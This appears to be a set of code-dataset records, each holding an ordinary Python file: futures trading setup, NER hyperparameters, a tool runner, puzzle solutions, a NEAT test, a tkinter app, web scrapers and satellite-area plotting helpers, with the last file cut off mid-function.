self.server_time_dict[instrument_id] = [b\"00:00:00\", b\"00:00:00\"]\n update_time = last_md[\"UpdateTime\"]\n self.server_time_dict[instrument_id][0] = update_time\n self.md_dict[instrument_id] = last_md\n if self.server_time_dict[instrument_id][1] != b\"00:00:00\":\n self.update_time_trigger(self.server_time_dict[instrument_id], instrument_id)\n self.server_time_dict[instrument_id][1] = update_time\n\n self.check_position()\n else:\n sleep(1)\n\n\nif __name__ == \"__main__\":\n from account_info import my_future_account_info_dict\n\n future_account = my_future_account_info_dict['SimNow']\n\n # 共享队列\n share_queue = Queue(maxsize=100)\n pl_parameter = {b\"ID\": 9,\n # 开仓时间点\n b\"AnchorTimeList\": [b\"01:05:00\", b\"01:05:30\", b\"01:06:00\", b\"01:06:30\", b\"01:07:00\", b\"01:07:30\", b\"01:08:00\", b\"01:08:30\"],\n # 计划交易的合约及参数\n b\"TradingScheduleDict\": {b\"rb2001\": {b\"ExchangeID\": b\"SHFE\", b\"Direction\": 1, b\"Volume\": 1},\n b\"ag1912\": {b\"ExchangeID\": b\"SHFE\", b\"Direction\": 1, b\"Volume\": 1},\n },\n # 止损参数\n b\"ProfitLossParameterDict\": {b\"rb2001\": {b\"0\": [2], b\"1\": [2]},\n b\"ag1912\": {b\"0\": [10], b\"1\": [10]},\n }\n }\n share_queue.put(pl_parameter)\n\n # 行情进程\n md_process = Process(target=TickEngine, args=(future_account.server_dict['MDServer']\n , future_account.broker_id\n , future_account.investor_id\n , future_account.password\n , future_account.app_id\n , future_account.auth_code\n , future_account.instrument_id_list\n , [share_queue]\n , future_account.md_page_dir)\n )\n\n # 交易进程\n trader_process = Process(target=MyProfitLossManager, args=(future_account.server_dict['TDServer']\n , future_account.broker_id\n , future_account.investor_id\n , future_account.password\n , future_account.app_id\n , future_account.auth_code\n , share_queue\n , future_account.td_page_dir)\n )\n\n md_process.start()\n trader_process.start()\n\n md_process.join()\n trader_process.join()\n","sub_path":"AdvancedCookbook/timing_trading/timing_trading_example.py","file_name":"timing_trading_example.py","file_ext":"py","file_size_in_byte":7134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"219963034","text":"# This file acts as a constant for hyperparameter tuning and other config\n\nimport os\n\n# If using GPU, you can set num_workers > 0\n# Otherwise (using CPU), set the num_workers = 0\ntrain_param = {\n 'batch_size': 8,\n 'shuffle': True,\n 'num_workers': 2\n}\n\ndev_param = {\n 'batch_size': 8,\n 'shuffle': True,\n 'num_workers': 2\n}\n\nMAX_LEN = 150 # The length of additional padding for BERT\nEPOCHS = 5\nLEARNING_RATE = 3e-05\nTRAIN_DEV_SPLIT = 0.8\nGPU = 0 # Deciding which gpu to be used. 0 is the default value\nDEVICE = 'cuda'\nBIOBERT_CONFIG = 'biobert_v1.1_pubmed/config.json'\nBIOBERT_MODEL = 'biobert_v1.1_pubmed/pytorch_model.bin'\nBIOBERT_VOCAB = 'biobert_v1.1_pubmed/vocab.txt'\nSAVED_MODEL_DIR = 'models/ner/saved_model'\nCHECK_FOLDER = os.path.isdir(SAVED_MODEL_DIR)\nTRAIN_DATA_DIR = 'data/ner/train.tsv'\nTEST_DATA_DIR = 'data/ner/test.tsv'\n\nimport json\n\ndef save_hp_to_json(traintime):\n \"\"\"\n A function to save hyperparameter data to json file\n\n args:\n datetime -- datetime object to generate hyperparameter json file\n e.g. 'hyperparam_20211013_075856'\n\n \"\"\"\n hp_data = {}\n hp_data['train_param'] = train_param\n hp_data['dev_param'] = dev_param\n hp_data['max_len'] = MAX_LEN\n hp_data['epochs'] = EPOCHS\n hp_data['learning_rate'] = LEARNING_RATE\n hp_data['train_dev_split'] = TRAIN_DEV_SPLIT\n hp_data['gpu'] = GPU\n savedate = traintime.strftime(\"%Y%m%d\")\n savetime = traintime.strftime(\"%H%M%S\")\n\n if not CHECK_FOLDER:\n os.makedirs(SAVED_MODEL_DIR)\n with open(f'models/ner/saved_model/hyperparam_{savedate}_{savetime}.json', 'w') as outfile:\n json.dump(hp_data, outfile)\n","sub_path":"models/ner/hyperparameter.py","file_name":"hyperparameter.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"152296156","text":"import logging\nimport simplejson as json\ntry:\n import subprocess32 as subprocess\nexcept ImportError:\n import subprocess\nimport sys\nimport time\nfrom collections import OrderedDict\nfrom invisibleroads.scripts import (\n Script, StoicArgumentParser, configure_subparsers, get_scripts_by_name,\n run_scripts)\nfrom invisibleroads_macros.configuration import (\n split_arguments, SECTION_TEMPLATE)\nfrom invisibleroads_macros.disk import (\n cd, copy_text, link_path, make_folder, COMMAND_LINE_HOME, HOME_FOLDER)\nfrom invisibleroads_macros.iterable import merge_dictionaries\nfrom invisibleroads_macros.text import unicode_safely\nfrom os.path import abspath, basename, exists, isabs, join\nfrom stevedore.extension import ExtensionManager\n\nfrom ..configurations import (\n ResultConfiguration, load_result_arguments, load_tool_definition,\n parse_data_dictionary, render_command)\nfrom ..exceptions import CrossComputeError, DataParseError\nfrom ..extensions import DefaultTool\nfrom ..symmetries import SCRIPT_ENVIRONMENT\nfrom ..types import initialize_data_types\n\n\nclass ToolScript(Script):\n\n def configure(self, argument_subparser):\n argument_subparser.add_argument(\n 'tool_name', nargs='?', type=unicode_safely, default='')\n argument_subparser.add_argument(\n '--data_folder', metavar='FOLDER', type=unicode_safely)\n argument_subparser.add_argument(\n '--suffix_by_data_type', metavar='JSON', type=json.loads)\n argument_subparser.add_argument('--debug', action='store_true')\n\n def run(self, args):\n initialize_data_types(args.suffix_by_data_type)\n tool_definition = prepare_tool_definition(args.tool_name, args.debug)\n tool_name = tool_definition['tool_name']\n data_folder = args.data_folder or join(\n HOME_FOLDER, '.crosscompute', tool_name)\n logging.basicConfig(level=logging.WARNING)\n return tool_definition, data_folder\n\n\ndef launch(argv=sys.argv):\n argument_parser = StoicArgumentParser('crosscompute', add_help=False)\n argument_subparsers = argument_parser.add_subparsers(dest='command')\n scripts_by_name = get_scripts_by_name('crosscompute')\n configure_subparsers(argument_subparsers, scripts_by_name)\n args = argument_parser.parse_known_args(argv[1:])[0]\n run_scripts(scripts_by_name, args)\n\n\ndef prepare_tool_definition(tool_name, debug=False):\n if exists('f.cfg'):\n tool_definition = load_tool_definition('f.cfg')\n tool_definition.update(load_result_arguments('x.cfg', tool_definition))\n return tool_definition\n\n for x in ExtensionManager('crosscompute.extensions').extensions:\n if tool_name.endswith('.' + x.name):\n ToolExtension = x.plugin\n break\n else:\n ToolExtension = DefaultTool\n\n try:\n tool_definition = ToolExtension.prepare_tool_definition(\n tool_name, debug)\n except CrossComputeError as e:\n exit(e)\n return tool_definition\n\n\ndef corral_arguments(argument_folder, result_arguments, use=link_path):\n d = result_arguments.copy()\n make_folder(argument_folder)\n for k, v in result_arguments.items():\n if k.endswith('_path'):\n assert isabs(v)\n d[k] = use(join(argument_folder, basename(v)), v)\n return d\n\n\ndef run_script(\n tool_definition, result_arguments, result_folder, target_folder=None,\n environment=None, quietly=False):\n timestamp, environment = time.time(), environment or {}\n if 'target_folder' in tool_definition['argument_names']:\n y = make_folder(abspath(target_folder or join(result_folder, 'y')))\n result_arguments = OrderedDict(result_arguments, target_folder=y)\n # Record\n result_configuration = ResultConfiguration(result_folder, quietly)\n result_configuration.save_tool_location(tool_definition)\n result_configuration.save_result_arguments(result_arguments, environment)\n # Run\n command_terms = split_arguments(render_command(tool_definition[\n 'command_template'].replace('\\n', ' '), result_arguments))\n result_properties = OrderedDict()\n try:\n with cd(tool_definition['configuration_folder']):\n command_process = subprocess.Popen(\n command_terms, stdout=subprocess.PIPE, stderr=subprocess.PIPE,\n env=merge_dictionaries(environment, SCRIPT_ENVIRONMENT))\n except OSError:\n stdout, stderr = None, 'Command not found'\n else:\n stdout, stderr = [x.rstrip().decode(\n 'utf-8') for x in command_process.communicate()]\n if command_process.returncode:\n result_properties['return_code'] = command_process.returncode\n # Save\n result_properties.update(_process_streams(\n stdout, stderr, result_folder, tool_definition, quietly))\n result_properties['execution_time_in_seconds'] = time.time() - timestamp\n result_configuration.save_result_properties(result_properties)\n result_configuration.save_result_script(tool_definition, result_arguments)\n if 'target_folder' in tool_definition['argument_names']:\n link_path(join(result_folder, 'y'), result_arguments['target_folder'])\n return result_properties\n\n\ndef _process_streams(\n stdout, stderr, result_folder, tool_definition, quietly=False):\n d, type_errors = OrderedDict(), OrderedDict()\n for file_name, stream_name, stream_content in [\n ('stdout.log', 'standard_output', stdout),\n ('stderr.log', 'standard_error', stderr)]:\n if not stream_content:\n continue\n stream_content = stream_content.replace(HOME_FOLDER, COMMAND_LINE_HOME)\n copy_text(join(result_folder, file_name), stream_content + '\\n')\n if not quietly:\n print(SECTION_TEMPLATE % (stream_name, stream_content))\n try:\n value_by_key = parse_data_dictionary(\n stream_content, join(result_folder, 'y'), tool_definition)\n except DataParseError as e:\n for k, v in e.message_by_name.items():\n type_errors['%s.error' % k] = v\n value_by_key = e.value_by_key\n if tool_definition.get('show_' + stream_name):\n d[stream_name] = stream_content\n if value_by_key:\n d[stream_name + 's'] = value_by_key\n if type_errors:\n d['type_errors'] = type_errors\n return d\n","sub_path":"crosscompute/scripts/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"419562823","text":"#Sum of products which can be represented as pan-digital\n#like The product 7254 is unusual, as the identity, 39 × 186 = 7254, \n#containing multiplicand, multiplier, and product is 1 through 9 pan-digital.\n\ndef isPanDigital(n):\n #The n digit number should have digits from 1 to n, no duplicates\n s = str(n)\n sset = set(s)\n length = len(s)\n if length != len(sset):\n return False\n for d in sset:\n if int(d) < 1 or int(d) > length:\n return False\n return True\n\nprods = {}\nprodsum = 0\nfor mpd in range(2, 100):\n for mpr in range(123 if mpd>9 else 1234, 10000//mpd+1):\n p = mpd*mpr\n s = str(mpd)+str(mpr)+str(p)\n if isPanDigital(int(s)):\n if not prods.get(p, None):\n prods[p] = str(mpd)+'X'+str(mpr)\n prodsum += p\n\nprint(prodsum)\nprint(prods)\n","sub_path":"scripts/032.py","file_name":"032.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"383334396","text":"# -*- coding: utf-8 -*-\r\n# --------------------------------------------------------------------------------------------------------\r\n''' XOR Test '''\r\nfrom Population import Population\r\nfrom Connection import Connection\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\np = Population(150)\r\nfor player in p.people:\r\n weight = 2*np.random.rand() -1\r\n node1 = player.brain.nodes[0]\r\n node2 = player.brain.nodes[-1]\r\n innovationNumber = player.brain.getInnovationNumber(node1, node2 , p.innovationHistory)\r\n connection = Connection(node1, node2, weight, innovationNumber)\r\n player.brain.addConnection(connection)\r\n\r\n weight = 2*np.random.rand()-1\r\n node1 = player.brain.nodes[1]\r\n node2 = player.brain.nodes[-1]\r\n innovationNumber = player.brain.getInnovationNumber(node1, node2 , p.innovationHistory)\r\n connection = Connection(node1, node2, weight, innovationNumber)\r\n player.brain.addConnection(connection)\r\n\r\n weight = 2*np.random.rand()-1\r\n node1 = player.brain.nodes[2]\r\n node2 = player.brain.nodes[-1]\r\n innovationNumber = player.brain.getInnovationNumber(node1, node2 , p.innovationHistory)\r\n connection = Connection(node1, node2, weight, innovationNumber)\r\n player.brain.addConnection(connection)\r\n\r\nmaxScore = 0\r\nwhile maxScore < 4 and p.gen > 50:\r\n p.updateAlive()\r\n for player in p.people:\r\n if player.score > maxScore:\r\n maxScore = player.score\r\n p.naturalSelection()\r\n print(p.gen)\r\np.updateAlive()\r\np.prepare()\r\np.best.brain.draw()\r\n\r\nfig = plt.figure()\r\nax = fig.add_subplot(111)\r\n\r\nfit = []\r\nfor player in p.bests:\r\n fit.append(player.fitness)\r\nx = range(len(p.bests))\r\nline, = ax.plot(x,fit, color = 'red', label = 'Max fitness')\r\n\r\n\r\naverage = []\r\nfor av in p.average:\r\n average.append(av)\r\nline2, = ax.plot(x, average, color = 'green', label = 'average')\r\nax.legend()\r\nax.set_title('Fitness')\r\nplt.show(fig)\r\n\r\n\r\n# --------------------------------------------------------------------------------------------------------\r\n''' Feed forward test '''\r\n#from Population import Population\r\n#\r\n#p = Population(20)\r\n#inputs = [0.5, 0.2]\r\n#for player in p.people:\r\n# print(player.think(inputs))\r\n\r\n\r\n\r\n\r\n\r\n# --------------------------------------------------------------------------------------------------------\r\n''' Count gene and species recognition '''\r\n#from Population import Population\r\n#from Species import Species\r\n#import time\r\n#\r\n#p = Population(20)\r\n#for player in p.people[:5]:\r\n# player.brain.connectionMutation(p.innovationHistory)\r\n# player.brain.connectionMutation(p.innovationHistory)\r\n# player.brain.connectionMutation(p.innovationHistory)\r\n# player.brain.nodeMutation(p.innovationHistory)\r\n# player.brain.connectionMutation(p.innovationHistory)\r\n# player.brain.draw()\r\n# time.sleep(1)\r\n#\r\n#p.evaluate()\r\n#s = Species(p.people[0])\r\n#for player in p.people[:5]:\r\n# print(s.sameSpecies(player))\r\n\r\n\r\n\r\n# --------------------------------------------------------------------------------------------------------\r\n''' Exemple of why connections that are connected to the two same nodes should have the same innovation number '''\r\n#from Population import Population\r\n#from Connection import Connection\r\n#import time\r\n#\r\n#p = Population(10)\r\n#player = p.people[0]\r\n#node1 = player.brain.nodes[0]\r\n#node2 = player.brain.nodes[3]\r\n#weight = -0.8\r\n#connection = Connection(node1, node2, weight, player.brain.getInnovationNumber(node1, node2, p.innovationHistory))\r\n#player.brain.addConnection(connection)\r\n#player.brain.nodeMutation(p.innovationHistory)\r\n#node1 = player.brain.nodes[2]\r\n#node2 = player.brain.nodes[4]\r\n#weight = 0.8\r\n#connection = Connection(node1, node2, weight, player.brain.getInnovationNumber(node1, node2, p.innovationHistory))\r\n#player.brain.addConnection(connection)\r\n#player.brain.draw()\r\n#time.sleep(2)\r\n#\r\n#player2 = p.people[1]\r\n#node1 = player2.brain.nodes[2]\r\n#node2 = player2.brain.nodes[4]\r\n#weight = 0.3\r\n#connection = Connection(node1, node2, weight, player2.brain.getInnovationNumber(node1, node2, p.innovationHistory))\r\n#player2.brain.addConnection(connection)\r\n#player2.brain.draw()\r\n\r\n\r\n\r\n\r\n\r\n# --------------------------------------------------------------------------------------------------------\r\n''' Innovation testing '''\r\n#from Population import Population\r\n#\r\n#p = Population(20)\r\n#print(p.innovationHistory)\r\n#for player in p.people:\r\n# player.brain.connectionMutation(p.innovationHistory)\r\n# print()\r\n## print(p.innovationHistory)\r\n","sub_path":"2nd Attempt/Testing.py","file_name":"Testing.py","file_ext":"py","file_size_in_byte":4527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"123025846","text":"import empl\r\nimport os.path as path\r\nimport tkinter # note that module name has changed from Tkinter in Python 2 to tkinter in Python 3\r\nimport tkinter.messagebox as messagebox\r\nfrom tkinter import ttk\r\nimport pickle\r\n\r\nclass management:\r\n\r\n def __init__(self,filename= False):\r\n self.studentlist = {}\r\n self.studentname = [\"select\"]\r\n\r\n\r\n\r\n self.root = tkinter.Tk()\r\n self.root.geometry(\"300x300\")\r\n self.spacingframe = tkinter.Frame(self.root,height = 10 ,relief = tkinter.FLAT)\r\n self.spacingframe.pack()\r\n\r\n\r\n\r\n #buttons\r\n\r\n\r\n self.buttonframe = ttk.Frame(self.root, height=50,relief=tkinter.FLAT)\r\n self.buttonframe.pack(pady = 2)\r\n self.createemp = ttk.Button(self.buttonframe,text = \"add student\",command = self.addstudent)\r\n self.createemp.pack(pady = 2)\r\n\r\n\r\n\r\n #makeing drop down list\r\n self.spacingframe1 = ttk.Frame(self.root, height=10, relief=tkinter.FLAT)\r\n self.spacingframe1.pack(pady = 2)\r\n self.selectionframe = ttk.Frame(self.root, height=50, relief=tkinter.FLAT)\r\n self.selectionframe.pack(pady = 2)\r\n\r\n self.selectlable = ttk.Label(self.selectionframe, text=\"student \")\r\n self.selectlable.pack(side=tkinter.LEFT)\r\n\r\n self.choice = tkinter.StringVar(self.root)\r\n self.choice.set(\"select\")\r\n self.students = tkinter.ttk.Combobox(self.selectionframe, textvariable=self.choice, state=\"readonly\")\r\n self.students[\"values\"] = self.studentname\r\n self.students.pack(pady = 2)\r\n\r\n if filename:\r\n self.load(filename)\r\n\r\n\r\n #more buttons\r\n self.buttonframe1 = ttk.Frame(self.root, relief=tkinter.FLAT)\r\n self.buttonframe1.pack(pady = 2)\r\n\r\n self.checkinbutton = ttk.Button(self.buttonframe1,text = \"checkin\" , command = self.checkinfun)\r\n self.checkinbutton.pack(side = tkinter.LEFT,pady = 10, padx = 25)\r\n\r\n self.checkoutbutton = ttk.Button(self.buttonframe1, text=\"checkuout\",command = self.checkoutfun )\r\n self.checkoutbutton.pack(pady = 10, padx = 25)\r\n\r\n self.exitbutton = ttk.Button(self.root, text=\"exit\" , command = self.exit)\r\n self.exitbutton.pack(pady = 10, padx = 25)\r\n self.root.protocol(\"WM_DELETE_WINDOW\",self.exit)\r\n self.root.mainloop()\r\n\r\n\r\n\r\n def addstudent(self):\r\n self.addempwindow = tkinter.Toplevel(self.root)\r\n self.addempwindow.geometry(\"200x200\")\r\n\r\n nameframe = ttk.Frame(self.addempwindow, height=50, relief=tkinter.FLAT)\r\n nameframe.pack(pady=4)\r\n\r\n namelable = ttk.Label(nameframe, text=\"name \")\r\n namelable.pack(side=tkinter.LEFT)\r\n\r\n self.nameentry = ttk.Entry(nameframe)\r\n self.nameentry.pack()\r\n\r\n ageframe = ttk.Frame(self.addempwindow, height=50, relief=tkinter.FLAT)\r\n ageframe.pack(pady=4)\r\n\r\n agelable = ttk.Label(ageframe, text=\"age \")\r\n agelable.pack(side=tkinter.LEFT)\r\n\r\n self.ageentry = ttk.Entry(ageframe)\r\n self.ageentry.pack()\r\n\r\n roleframe = ttk.Frame(self.addempwindow, height=50, relief=tkinter.FLAT)\r\n roleframe.pack(pady=4)\r\n\r\n rolelable = ttk.Label(roleframe, text=\"role \")\r\n rolelable.pack(side=tkinter.LEFT)\r\n\r\n self.roleentry = ttk.Entry(roleframe)\r\n self.roleentry.pack()\r\n\r\n saveframe = ttk.Frame(self.addempwindow, height=50, relief=tkinter.FLAT)\r\n saveframe.pack(pady=4)\r\n\r\n savebutton = ttk.Button(saveframe, text=\"ok\" , command = self.getnewentry)\r\n savebutton.pack(side=tkinter.LEFT)\r\n\r\n\r\n\r\n\r\n def exit(self):\r\n for i in self.studentlist:\r\n self.studentlist[i].checkout()\r\n if messagebox.showinfo(\"exit\", \"saving\"):\r\n self.root.destroy()\r\n\r\n def checkinfun(self):\r\n if self.choice.get()!=\"select\":\r\n self.studentlist[self.choice.get()].checkin()\r\n\r\n def checkoutfun(self):\r\n if self.choice.get()!=\"select\":\r\n self.studentlist[self.choice.get()].checkout()\r\n\r\n def getnewentry(self):\r\n self.studentlist[self.nameentry.get()]=empl.student(self.nameentry.get(),self.ageentry.get(),self.roleentry.get())\r\n self.studentname.append((self.nameentry.get()))\r\n self.students[\"values\"] = self.studentname\r\n self.addempwindow.destroy()\r\n\r\n def save(self,filename):\r\n fn = open(filename, \"wb\")\r\n pickle.dump(self.studentlist,fn)\r\n pickle.dump(self.studentname,fn)\r\n\r\n def load(self,filename):\r\n fn = open(filename, \"rb\")\r\n self.studentlist = pickle.load(fn)\r\n self.studentname = pickle.load(fn)\r\n self.students[\"values\"] = self.studentname\r\n\r\n\r\nfilename = \"everyone.bin\"\r\n\r\n\r\nif path.isfile(filename):\r\n a = management(filename)\r\nelse:\r\n a = management()\r\n\r\n\r\n\r\na.save(filename)\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"225117817","text":"#-*- coding:utf-8 -*-\nimport requests\nfrom bs4 import BeautifulSoup as bs\nimport time\nfrom multiprocessing import Pool # Pool import하기\nimport datetime\nfrom db_connect import mysql \nclass test:\n def __init__(self,time):\n self.time=time\n self.session = requests.Session()\n def get_content(self,total):\n conn = mysql.connect()\n cursor = conn.cursor()\n data = total[1]\n nick = total[0]\n abs_link = 'https://github.com/'+data\n user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36'\n headers = {\n\n 'User-Agent' : user_agent,\n \"Cookie\" : \"tz=Asia%2FSeoul;\"\n}\n \n req = self.session.get(abs_link)\n req = requests.get(abs_link,headers=headers)\n html = req.text\n soup = bs(html, 'html.parser')\n a= soup.findAll('rect')\n resulta={}\n try:\n query = \"update crawler set count = {count} where nickname = '{nickname}'\".format(nickname=nick,count=a[-1]['data-count'])\n cursor.execute(query)\n _data = cursor.fetchall()\n if not _data:\n conn.commit()\n print({\"update Success\": 200})\n else:\n conn.rollback()\n print( {\"update Failed\": 404})\n # resulta[\"id\"] = nick\n # resulta[\"value\"] = a[-1]['data-count']\n except Exception as e:\n print(e) \n cursor.close()\n conn.close()\n return resulta\n\n def register_content(self,total):\n conn = mysql.connect()\n cursor = conn.cursor()\n\n data = total[1]\n nick = total[0]\n abs_link = 'https://github.com/'+data\n user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36'\n headers = {\n\n 'User-Agent' : user_agent,\n \"Cookie\" : \"tz=Asia%2FSeoul;\"\n}\n \n req = self.session.get(abs_link)\n req = requests.get(abs_link,headers=headers)\n html = req.text\n soup = bs(html, 'html.parser')\n a= soup.findAll('rect')\n resulta={}\n try:\n query = \"insert into crawler(nickname,count) values('{nickname}', {count})\".format(nickname=nick,count=a[-1]['data-count'])\n cursor.execute(query)\n _data = cursor.fetchall()\n print(_data)\n if not _data:\n conn.commit()\n print({\"Register Success\": 200})\n else:\n conn.rollback()\n print( {\"Register Failed\": 404})\n # resulta[\"id\"] = nick\n # resulta[\"value\"] = a[-1]['data-count']\n except Exception as e:\n print(e) \n cursor.close()\n conn.close()\n\n return resulta\n\n def execute(self,num):\n result=[]\n a={ '컴공돌이' : 'cafemug', '또르' : '9992', '복이' : 'changbokLee', '뇸뇸' : 'ellapresso', 'ㄷㄷ' : 'x86kernel', '뇌가딴딴' : 'ljhg1124', '싸이클러' : 'msnodeve', '1컴이' : 'horace-velmont', '레게힙합소년' : 'samkookji77', '방탕성현단' : 'seonghy', '해피스마일' : 'rnhappysmile', 'ccpo' : 'ccppoo', '깃토리' : 'haeyoonjo', '퐁퐁' : 'seongminseok', '깃별' : 'wg19', '맹코' : 'mengkko', '감동란' : 'th787706', '현' : 'kim6394', '개발냄새' : 'taewoo1991', 'joe' : 'porquelaquiero', '야옹' : 'asw91666', 'CLY' : 'dogcolley', '펭귄' : \"cruisediary\",\"sogo\" : \"sogoagain\", \"냐\":\"lilynys\", \"kstost\":\"kstost\",\"나부랭이\":\"silverthreadk\"}\n pool = Pool(processes=num) # 4개의 프로세스를 사용합니다.\n result.extend(pool.map(self.get_content, [(k,v) for k,v in a.items()]))# get_contetn 함수를 넣어줍시다.\n return(result)\n\nif __name__ ==\"__main__\":\n now = datetime.datetime.now()\n nowTime = now.strftime('%Y-%m-%d')\n e= test(nowTime)\n result = e.execute(2)\n","sub_path":"test_by_python/thread_crawler.py","file_name":"thread_crawler.py","file_ext":"py","file_size_in_byte":3966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"549141461","text":"import bot.sites.bestbuy as bb\nimport bot.helpers.twilioHelper as twilio\n\n\ndef siteResults():\n\n bb_message = bb.scraper()\n return [bb_message,]\n\ndef fullReport():\n site_results = siteResults()\n report = \"\"\n \n for result in site_results:\n if result != False:\n print('Found something! Writing Report!')\n \n\n\n print(str(result['message']))\n if result['error'] != True:\n report = report + f\"{str(result['message'])} \\n\"\n \n else:\n print('Nothing found!')\n \n if report != \"\":\n twilio.send_sms(report)\n \n\n\n\n \n\n\n\n\n \n\n ","sub_path":"bot/reporter/report.py","file_name":"report.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"42069096","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /home/doakey/Sync/Programming/reflowrst/reflowrst/tools/get_field_name.py\n# Compiled at: 2018-01-26 15:31:48\n# Size of source mod 2**32: 290 bytes\n\n\ndef get_field_name(words):\n for x in range(len(words)):\n if words[x].endswith(':'):\n if not words[x].endswith('\\\\:'):\n field_name = ' '.join(words[0:x + 1])\n words = words[x + 1:]\n return (field_name, words)\n\n return (\n 'collect_field.py: ERROR:', [])","sub_path":"pycfiles/reflowrst-1.1.0.tar/get_field_name.cpython-36.py","file_name":"get_field_name.cpython-36.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"318607041","text":"import requests;\nfrom bs4 import BeautifulSoup;\n\n\nurl=\"http://astro.click108.com.tw/daily_8.php?iAstro=8\"\nrequest=requests.get(url)\ncontent=request.content\nsoup=BeautifulSoup(content,\"html.parser\")\n#取出本周的所有日期 ex.2010-01-01 2010-01-02\nall_days=soup.select('#iAcDay')\nall_days = all_days[0].get_text().split('\\n')\n# print(all_days);\nfilename='horoscope.txt';\nfile = open(filename, 'w')\nfor day in all_days:\n if day:\n #當天日期\n basic_url=url+'&iAcDay='\n dayurl=basic_url + day\n \n request=requests.get(dayurl)\n content=request.content\n soup=BeautifulSoup(content,\"html.parser\")\n daycontent=soup.find('div',{'class':'TODAY_CONTENT'})\n print(day)\n file.write(day)\n file.write(daycontent.get_text())\n\nfile.close()\nprint('射手座的運勢請看附檔horoscope.txt')\n","sub_path":"horoscope/horoscope-code/horoscope.py","file_name":"horoscope.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"74560944","text":"# coding: utf - 8\nimport numpy as np\n\nimport matplotlib.pyplot as plt\nfrom matplotlib.patches import Polygon as plt_polygon\nfrom mpl_toolkits.basemap import Basemap\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\n\nfrom shapely.geometry import Polygon, MultiLineString\nfrom sentinelhub import CRS, transform_bbox\n\n\ndef show_area(area_shape, area_buffer=0.3):\n fig = plt.figure(figsize=(10, 10))\n ax = fig.add_subplot(111)\n\n minx, miny, maxx, maxy = area_shape.bounds\n lng, lat = (minx + maxx) / 2, (miny + maxy) / 2\n\n m = Basemap(projection='ortho', lat_0=lat, lon_0=lng, resolution='l')\n m.drawcoastlines()\n m.bluemarble()\n\n if isinstance(area_shape, Polygon):\n area_shape = [area_shape]\n for polygon in area_shape:\n x, y = np.array(polygon.boundary)[0]\n m_poly = []\n for x, y in np.array(polygon.boundary):\n m_poly.append(m(x, y))\n ax.add_patch(\n plt_polygon(\n np.array(m_poly), closed=True, facecolor='red', edgecolor='red'))\n\n plt.tight_layout()\n plt.show()\n\n\ndef show_splitter(splitter, alpha=0.2, area_buffer=0.2, show_legend=False):\n area_bbox = splitter.get_area_bbox()\n minx, miny, maxx, maxy = area_bbox\n lng, lat = area_bbox.get_middle()\n w, h = maxx - minx, maxy - miny\n minx = minx - area_buffer * w\n miny = miny - area_buffer * h\n maxx = maxx + area_buffer * w\n maxy = maxy + area_buffer * h\n\n fig = plt.figure(figsize=(10, 10))\n ax = fig.add_subplot(111)\n\n base_map = Basemap(\n projection='mill',\n lat_0=lat,\n lon_0=lng,\n llcrnrlon=minx,\n llcrnrlat=miny,\n urcrnrlon=maxx,\n urcrnrlat=maxy,\n resolution='l',\n epsg=4326)\n base_map.drawcoastlines(color=(0, 0, 0, 0))\n\n area_shape = splitter.get_area_shape()\n if isinstance(area_shape, Polygon):\n area_shape = [area_shape]\n for polygon in area_shape:\n if isinstance(polygon.boundary, MultiLineString):\n for linestring in polygon.boundary:\n ax.add_patch(\n plt_polygon(\n np.array(linestring),\n closed=True,\n facecolor=(0, 0, 0, 0),\n edgecolor='red'))\n else:\n ax.add_patch(\n plt_polygon(\n np.array(polygon.boundary),\n closed=True,\n facecolor=(0, 0, 0, 0),\n edgecolor='red'))\n\n bbox_list = splitter.get_bbox_list()\n info_list = splitter.get_info_list()\n\n cm = plt.get_cmap('jet', len(bbox_list))\n legend_shapes = []\n for i, (bbox, info) in enumerate(zip(bbox_list, info_list)):\n wgs84_bbox = transform_bbox(bbox, CRS.WGS84).get_polygon()\n\n tile_color = tuple(list(cm(i))[:3] + [alpha])\n ax.add_patch(\n plt_polygon(\n np.array(wgs84_bbox),\n closed=True,\n facecolor=tile_color,\n edgecolor='green'))\n\n if show_legend:\n legend_shapes.append(plt.Rectangle((0, 0), 1, 1, fc=cm(i)))\n\n if show_legend:\n plt.legend(legend_shapes, [\n '{},{}'.format(info['index_x'], info['index_y']) for info in info_list\n ])\n plt.tight_layout()\n plt.show()\n\n\ndef show_slices(batches, scan_indices, ns_slice, grid=True, **kwargs):\n \"\"\" Plot slice with number n_slice from scan with index given by scan_index from batch\n \"\"\"\n font_caption = {\n 'family': 'serif',\n 'color': 'darkred',\n 'weight': 'normal',\n 'size': 18\n }\n font = {'family': 'serif', 'color': 'darkred', 'weight': 'normal', 'size': 15}\n\n # fetch some arguments, make iterables out of args\n def iterize(arg):\n return arg if isinstance(arg, (list, tuple)) else (arg,)\n\n components = 